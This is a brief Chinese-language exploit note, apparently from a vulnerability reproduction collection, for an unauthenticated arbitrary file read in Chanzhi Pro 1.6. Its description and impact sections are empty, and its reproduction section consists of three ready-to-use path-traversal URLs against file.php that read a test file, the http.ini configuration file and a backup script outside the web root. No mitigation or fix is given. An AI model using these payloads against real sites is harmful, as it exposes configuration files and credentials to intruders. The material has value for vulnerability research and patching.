001-禅知 Pro 1.6 前台任意文件读取.md

647 B / 2021-07-17 00:01:24

    # 禅知 Pro 1.6 前台任意文件读取

### 一、漏洞简介

### 二、漏洞影响

### 三、复现过程

在网站根目录C:\xampp\chanzhi\www新建一个测试文件test.php

![](images/15897246284877.png)


执行payload查看文件内容：


```bash
http://url/file.php?pathname=../test.php&t=txt&o=source
```

![](images/15897246455810.png)


执行payload来查看程序的配置文件：


```bash
http://url/file.php?pathname=../http.ini&t=txt&o=source
```

![](images/15897246615371.png)


跨目录读取文件（前提是有目录权限）：


```bash
http://url/file.php?pathname=../../bin/php/backup.php&t=txt&o=source
```